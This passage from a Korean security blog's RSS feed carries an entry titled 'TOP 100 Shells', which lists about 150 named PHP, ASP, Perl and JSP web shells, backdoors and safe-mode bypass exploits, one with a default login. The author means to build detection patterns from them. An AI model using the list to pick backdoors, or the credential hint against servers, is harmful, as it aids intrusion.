	&lt;img id=&quot;ccl-icon-148-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/148&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x02 analysis</category>
			<category>iis</category>
			<category>IIsWebServer</category>
			<category>IIsWebService</category>
			<category>IIsWebVirtualDir</category>
			<category>metabase.xml</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/148</guid>
			<comments>http://malwarelab.tistory.com/entry/MetaBasexml-%ED%8C%8C%EC%9D%BC#entry148comment</comments>
			<pubDate>Fri, 22 Jul 2011 14:12:44 +0900</pubDate>
		</item>
		<item>
			<title>TOP 100 Shells</title>
			<link>http://malwarelab.tistory.com/entry/TOP-100-Shells</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;C99Shell v. 1.0 beta (5.02.2005)&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Cyber Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
GFS Web-Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NFM 1.8&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
r57shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Small Web Shell by ZaCo&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
nsTView v2.1&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
DxShell v1.0&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
C99madShell v. 2.0 madnet edition&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
CTT Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
GRP WebShell 2.0 release build 2018 (C)2006,Great&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Crystal shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Loaderz WEB Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NIX REMOTE WEB SHELL&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Antichat Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
CasuS 1.5&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Sincap 1.0&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
C99Shell v. 1.0 pre-release build(safe-mode)&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
hiddens shell v1&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Web-shell (c)ShAnKaR&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Predator&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
KA_uShell 0.1.6&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NGH&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
C2007Shell v. 1.0 pre-release build #16 Modded by Adora &amp;amp; u9 h4c93r&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Antichat Shell. Modified by Go0o$E&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
c0derz shell [csh] v. 0.1.1 release&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
iMHaBiRLiGi Php FTP&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
PHVayv&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
phpRemoteView&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
STNC WebShell v0.8&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
MyShell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
ZyklonShell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
AK-74 Security Team Web Shell Beta Version PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Gamma Web Shell&amp;nbsp; Perl-Cgi&amp;nbsp; &amp;nbsp;&lt;br /&gt;
go-shell&amp;nbsp; Perl-Cgi&amp;nbsp; &amp;nbsp;&lt;br /&gt;
PhpSpy Ver 2006 Perl-Cgi&amp;nbsp; &amp;nbsp;&lt;br /&gt;
CmdAsp.asp.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
CyberSpy5.Asp.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
klasvayv.asp.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
indexer.asp.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NTDaddy v1.9&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
reader.asp.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
RemExp.asp.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
zehir4.asp.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Elmaliseker.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
EFSO_2.txt&amp;nbsp; ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
accept_language&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Ajax_PHP Command Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Antichat Shell v1.3&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Ayyildiz Tim -AYT- Shell v 2.1 Biz&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
aZRaiLPhp v1.0&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
backupsql&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
c99&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
c99_locus7s&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
c99_madnet&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
c99_PSych0&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
c99_w4cking&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Crystal&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
ctt_sh&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
cybershell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
dC3 Security Crew Shell PRiV&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Dive Shell 1.0 - Emperor Hacking Team&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
DTool Pro&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Dx&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
GFS web-shell ver 3.1.7 - PRiV8&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
gfs_sh&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
h4ntu shell [powered by tsoi]&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
iMHaPFtp&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
ironshell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
JspWebshell 1.2&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
KAdot Universal Shell v0.1.6&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
lamashell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
load_shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
matamu&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Moroccan Spamers Ma-EditioN By GhOsT&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
myshell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Mysql interface v1.0&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
MySQL Web Interface Version 0.8&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
mysql&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
mysql_tool&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NCC-Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NetworkFileManagerPHP&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
nshell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
nstview&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
PH Vayv&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
PHANTASMA&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
PHP Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
php-backdoor&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
php-include-w-shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
pHpINJ&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
PHPJackal&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
PHPRemoteView&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Private-i3lue&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
pws&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
r57&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
r57_iFX&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
r57_kartal&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
r57_Mohajer22&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
rootshell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
ru24_post_sh&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
s72 Shell v1.1 Coding&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Safe0ver Shell -Safe Mod Bypass By Evilc0der&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
simple_cmd&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
simple-backdoor&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
SimShell 1.0 - Simorgh Security MGZ&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
SnIpEr_SA Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Uploader&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
WinX Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Worse Linux Shell&amp;nbsp; PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
zacosmall PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Antichat Shell v1.3 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Ayyildiz Tim -AYT- Shell v 2.1 Biz PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
aZRaiLPhp v1.0 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
CrystalShell v.1 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Cyber Shell (v 1.0) PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
dC3 Security Crew Shell PRiV PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Dive Shell 1.0 - Emperor Hacking Team PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
DxShell.1.0 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
ELMALISEKER Backd00r ASP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
GFS web-shell ver 3.1.7 - PRiV8 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
h4ntu shell [powered by tsoi] PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
JspWebshell 1.2 JSP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
KAdot Universal Shell v0.1.6 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Macker's Private PHPShell PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Mysql interface v1.0 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
MySQL Web Interface Version 0.8 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Perl Web Shell by RST-GHC PL&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Private-i3lue PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
RedhatC99 [login=redhat-pass=root] PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Rootshell.v.1.0 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
s72 Shell v1.1 Coding PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Safe0ver Shell -Safe Mod Bypass By Evilc0der PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
SimShell 1.0 - Simorgh Security MGZs PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
WinX Shell PHP&amp;nbsp; &amp;nbsp;&lt;br /&gt;
Worse Linux Shell PHP &lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
짬날때마다 하나씩 특징들을 분석해서 패턴화하면 좋을 듯...&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-147-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-147-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-147-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/147&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>top 100 shells</category>
			<category>webshell</category>
			<category>웹쉘</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/147</guid>
			<comments>http://malwarelab.tistory.com/entry/TOP-100-Shells#entry147comment</comments>
			<pubDate>Tue, 05 Jul 2011 13:39:09 +0900</pubDate>
		</item>
		<item>
			<title>YARA Project</title>
			<link>http://malwarelab.tistory.com/entry/YARA-Project</link>
			<description>&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://code.google.com/p/yara-project/&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://code.google.com/p/yara-project/&quot; target=&quot;_blank&quot; title=&quot;[http://code.google.com/p/yara-project/]로 이동합니다.&quot;&gt;http://code.google.com/p/yara-project/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
